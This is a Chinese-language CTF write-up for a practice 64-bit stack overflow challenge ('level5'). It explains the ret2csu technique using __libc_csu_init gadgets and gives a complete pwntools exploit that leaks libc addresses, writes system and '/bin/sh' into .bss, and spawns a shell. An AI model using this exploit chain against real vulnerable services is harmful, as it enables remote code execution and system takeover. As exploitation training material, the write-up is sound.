蒸米 棧溢出的x64位 level5 wp

_libc_csu_init函數(shù)是程序調(diào)用libc庫用來對程序進(jìn)行初始化的函數(shù)赠群，一般先于main函數(shù)執(zhí)行
而我們則是要利用_libc_csu_init其中兩端特殊的gadget

image.png

gadget 位于 0x400600 和 0x40061a地址
先借用0x40061a 處的gadget 將想要壓入寄存器的參數(shù)壓入
順序依次 rbx rbp r12 r13 r14 r15 特別是rbx=0 rbp=1 r12=target_function
然后再調(diào)用 0x400600處的gadget將 r13 r14 r15 的值和rdx rsi edi交換

這個通用gadget中還隱藏著兩個常用的gadget,我們可以通過錯位碼來得到它

image.png

image.png

通過 0x400621和0x400623獲得了pop rsi _r15 和pop_rdi兩個gadget 脸甘，就可以輕松調(diào)用兩個參數(shù)的函數(shù)了

payload：

payload = junk + p64(0x40061a) + p64(rbx)+ p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload +=p64(0x400600) # mov r13 rdx;mov r14 rsi ; mov r15 edi;
payload +='a'*0x38  
#填充0x38個字符 控制rsp指向我們想要返回的函數(shù)地址
>payload +=p64(return_add)

解題思路

1. 利用write函數(shù)泄露出libc內(nèi)存空間的信息
2. 通過泄露的信息獲得execve函數(shù)的地址
3. 將execve函數(shù)的地址和參數(shù)"/bin/sh\x00"一起寫入bss section中
4. 通過gadget 的call (r12,rbp,8) 調(diào)用execve函數(shù)

exp:

from pwn import*  
  
p = process('./leve52')  
elf = ELF('./leve52')  
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  
  
write_got = elf.got['write']  
write_plt = elf.symbols['write']  
read_got = elf.got['read']  
read_plt = elf.symbols['read']  
bss = elf.bss()  
start = 0x40061a  
end = 0x400600  
main = elf.symbols['main']  
  
junk = 'a'*(0x80+8)  
fakeebp = 'a'*8  
  
def csu(rbx, rbp, r12, r13, r14, r15, last):  
    # pop rbx,rbp,r12,r13,r14,r15  
    # rbx should be 0,  
    # rbp should be 1,enable not to jump  
    # r12 should be the function we want to call  
    # rdi=edi=r15d  
    # rsi=r14  
    # rdx=r13  
    payload = 'a' * 0x80 + fakeebp  
    payload += p64(start) + p64(rbx) + p64(rbp) + p64(r12) + p64(  
        r13) + p64(r14) + p64(r15)  
    payload += p64(end)  
    payload += 'a' * 0x38  
    payload += p64(last)  
    p.send(payload)  
    sleep(1)  
  
print "*************leak write_add**********"  
write_lib = libc.symbols['write']  
print "write_lib --> [%s] "%write_lib  
  
p.recvuntil("Hello, World\n")  
csu(0,1,write_got,8,write_got,1,main)  
  
write_add = u64(p.recv(8))  
print "write_add --> [%s]" %hex(write_add)  
  
lib_base = write_add - write_lib  
print "libc base --> [%s]" %hex(lib_base)  
system_add = lib_base + libc.symbols['system'] # system can not work up  
print "system_add --> [%s]" %hex(system_add)  
  
  
print "************write address and \'\bin\sh'\'***************"  
payload = junk + p64(start) + p64(0) + p64(1) + p64(read_got) + p64(16) + p64(bss) + p64(0)  
payload += p64(end)  
payload += 'a'*0x38  
payload +=p64(main)  
  
  
p.recvuntil('Hello, World\n')  
p.send(payload)  
p.send(p64(system_add)+'/bin/sh\x00')  
  
  
payload = junk + p64(start)  
payload += p64(0) + p64(1) + p64(bss) + p64(0) + p64(0) + p64(bss+8)  
payload += p64(end)  
payload += 'a'*0x38  
payload +=p64(main)  
p.recvuntil('Hello, World\n')  
p.send(payload)  
  
p.interactive()